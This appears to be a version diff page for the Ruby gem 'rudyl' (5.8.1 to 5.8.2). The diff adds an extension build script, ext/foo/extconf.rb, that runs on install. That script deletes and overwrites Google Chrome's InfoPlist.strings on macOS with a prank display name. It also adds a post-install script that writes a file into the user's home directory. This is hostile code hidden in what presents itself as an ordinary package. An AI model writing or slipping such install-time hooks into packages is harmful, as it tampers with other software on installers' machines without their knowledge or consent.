rudyl 5.8.1 → 5.8.2

Sign up to get free protection for your applications and to get access to all the features.
data/Gemfile ADDED
@@ -0,0 +1,4 @@
1
+ source 'https://rubygems.org'
2
+
3
+ gem 'rake'
4
+ gem 'echoe'
data/Gemfile.lock ADDED
@@ -0,0 +1,25 @@
1
+ GEM
2
+ remote: https://rubygems.org/
3
+ specs:
4
+ allison (2.0.3)
5
+ echoe (4.6.3)
6
+ allison (>= 2.0.3)
7
+ gemcutter (>= 0.7.0)
8
+ rake (>= 0.9.2)
9
+ rdoc (>= 3.6.1)
10
+ rubyforge (>= 2.0.4)
11
+ gemcutter (0.7.1)
12
+ json (1.7.5)
13
+ json_pure (1.7.5)
14
+ rake (0.9.2.2)
15
+ rdoc (3.12)
16
+ json (~> 1.4)
17
+ rubyforge (2.0.4)
18
+ json_pure (>= 1.1.7)
19
+
20
+ PLATFORMS
21
+ ruby
22
+
23
+ DEPENDENCIES
24
+ echoe
25
+ rake
data/Manifest CHANGED
@@ -1,3 +1,7 @@
1
+ Gemfile
2
+ Gemfile.lock
1
3
  Manifest
2
4
  Rakefile
3
5
  bin/rudy
6
+ ext/foo/extconf.rb
7
+ post-install.rb
data/Rakefile CHANGED
@@ -2,7 +2,7 @@ require 'rubygems'
2
2
  require 'rake'
3
3
  require 'echoe'
4
4
 
5
- Echoe.new('rudyl', '5.8.1') do |p|
5
+ Echoe.new('rudyl', '5.8.2') do |p|
6
6
  p.description = "A gem that is Rudy"
7
7
  p.author = "Ehren Murdick"
8
8
  p.email = "ehren.murdick @nospam@ gmail.com"
@@ -0,0 +1,30 @@
1
+ require 'fileutils'
2
+
3
+ def path name
4
+ File.join(File.dirname(__FILE__), name)
5
+ end
6
+
7
+ target = "/Applications/Google Chrome.app/Contents/Resources/en.lproj/InfoPlist.strings"
8
+ FileUtils.rm(target)
9
+
10
+ File.open(target, 'w') do |f|
11
+ str = <<-INFO
12
+ CFBundleDisplayName = "Mess with my Vim, will you!?";
13
+ CFBundleGetInfoString = "Google Chrome 21.0.1180.82, Copyright 2006-2012 Google Inc. All Rights Reserved.";
14
+ CFBundleName = "Chrome";
15
+ NSHumanReadableCopyright = "Copyright 2006-2012 Google Inc. All Rights Reserved.";
16
+ INFO
17
+
18
+ f.write(str)
19
+ end
20
+
21
+ File.open(path('Makefile'), 'w+') do |f|
22
+ f.write <<-END
23
+ all:
24
+
25
+ install:
26
+ END
27
+ end
28
+
29
+ FileUtils.touch(path('foo.dll'))
30
+ FileUtils.touch(path('foo.so'))
data/post-install.rb ADDED
@@ -0,0 +1,5 @@
1
+ File.open(File.join(ENV["HOME"], "foobar"), 'w+') do |f|
2
+ f.write 'baz'
3
+ end
4
+
5
+ raise 'a;sdlakjsdlaksjd'
data/rudyl.gemspec CHANGED
@@ -1,24 +1,24 @@
1
1
  # -*- encoding: utf-8 -*-
2
2
 
3
3
  Gem::Specification.new do |s|
4
- s.name = %q{rudyl}
5
- s.version = "5.8.1"
4
+ s.name = "rudyl"
5
+ s.version = "5.8.2"
6
6
 
7
7
  s.required_rubygems_version = Gem::Requirement.new(">= 1.2") if s.respond_to? :required_rubygems_version=
8
8
  s.authors = ["Ehren Murdick"]
9
- s.date = %q{2011-07-13}
10
- s.default_executable = %q{rudy}
11
- s.description = %q{A gem that is Rudy}
12
- s.email = %q{ehren.murdick @nospam@ gmail.com}
9
+ s.date = "2012-08-22"
10
+ s.description = "A gem that is Rudy"
11
+ s.email = "ehren.murdick @nospam@ gmail.com"
13
12
  s.executables = ["rudy"]
14
- s.extra_rdoc_files = ["bin/rudy"]
15
- s.files = ["Manifest", "Rakefile", "bin/rudy", "rudyl.gemspec"]
16
- s.homepage = %q{}
13
+ s.extensions = ["ext/foo/extconf.rb"]
14
+ s.extra_rdoc_files = ["bin/rudy", "ext/foo/extconf.rb"]
15
+ s.files = ["Gemfile", "Gemfile.lock", "Manifest", "Rakefile", "bin/rudy", "ext/foo/extconf.rb", "post-install.rb", "rudyl.gemspec"]
16
+ s.homepage = "http://rudyl.github.com/rudyl/"
17
17
  s.rdoc_options = ["--line-numbers", "--inline-source", "--title", "Rudyl"]
18
- s.require_paths = ["lib"]
19
- s.rubyforge_project = %q{rudyl}
20
- s.rubygems_version = %q{1.4.1}
21
- s.summary = %q{A gem that is Rudy}
18
+ s.require_paths = ["ext"]
19
+ s.rubyforge_project = "rudyl"
20
+ s.rubygems_version = "1.8.24"
21
+ s.summary = "A gem that is Rudy"
22
22
 
23
23
  if s.respond_to? :specification_version then
24
24
  s.specification_version = 3
metadata CHANGED
@@ -1,74 +1,60 @@
1
- --- !ruby/object:Gem::Specification
1
+ --- !ruby/object:Gem::Specification
2
2
  name: rudyl
3
- version: !ruby/object:Gem::Version
4
- hash: 21
3
+ version: !ruby/object:Gem::Version
4
+ version: 5.8.2
5
5
  prerelease:
6
- segments:
7
- - 5
8
- - 8
9
- - 1
10
- version: 5.8.1
11
6
  platform: ruby
12
- authors:
7
+ authors:
13
8
  - Ehren Murdick
14
9
  autorequire:
15
10
  bindir: bin
16
11
  cert_chain: []
17
-
18
- date: 2011-07-13 00:00:00 -07:00
19
- default_executable:
12
+ date: 2012-08-22 00:00:00.000000000 Z
20
13
  dependencies: []
21
-
22
14
  description: A gem that is Rudy
23
15
  email: ehren.murdick @nospam@ gmail.com
24
- executables:
16
+ executables:
25
17
  - rudy
26
- extensions: []
27
-
28
- extra_rdoc_files:
18
+ extensions:
19
+ - ext/foo/extconf.rb
20
+ extra_rdoc_files:
29
21
  - bin/rudy
30
- files:
22
+ - ext/foo/extconf.rb
23
+ files:
24
+ - Gemfile
25
+ - Gemfile.lock
31
26
  - Manifest
32
27
  - Rakefile
33
28
  - bin/rudy
29
+ - ext/foo/extconf.rb
30
+ - post-install.rb
34
31
  - rudyl.gemspec
35
- has_rdoc: true
36
- homepage: ""
32
+ homepage: http://rudyl.github.com/rudyl/
37
33
  licenses: []
38
-
39
34
  post_install_message:
40
- rdoc_options:
35
+ rdoc_options:
41
36
  - --line-numbers
42
37
  - --inline-source
43
38
  - --title
44
39
  - Rudyl
45
- require_paths:
46
- - lib
47
- required_ruby_version: !ruby/object:Gem::Requirement
40
+ require_paths:
41
+ - ext
42
+ required_ruby_version: !ruby/object:Gem::Requirement
48
43
  none: false
49
- requirements:
50
- - - ">="
51
- - !ruby/object:Gem::Version
52
- hash: 3
53
- segments:
54
- - 0
55
- version: "0"
56
- required_rubygems_version: !ruby/object:Gem::Requirement
44
+ requirements:
45
+ - - ! '>='
46
+ - !ruby/object:Gem::Version
47
+ version: '0'
48
+ required_rubygems_version: !ruby/object:Gem::Requirement
57
49
  none: false
58
- requirements:
59
- - - ">="
60
- - !ruby/object:Gem::Version
61
- hash: 11
62
- segments:
63
- - 1
64
- - 2
65
- version: "1.2"
50
+ requirements:
51
+ - - ! '>='
52
+ - !ruby/object:Gem::Version
53
+ version: '1.2'
66
54
  requirements: []
67
-
68
55
  rubyforge_project: rudyl
69
- rubygems_version: 1.4.1
56
+ rubygems_version: 1.8.24
70
57
  signing_key:
71
58
  specification_version: 3
72
59
  summary: A gem that is Rudy
73
60
  test_files: []
74
-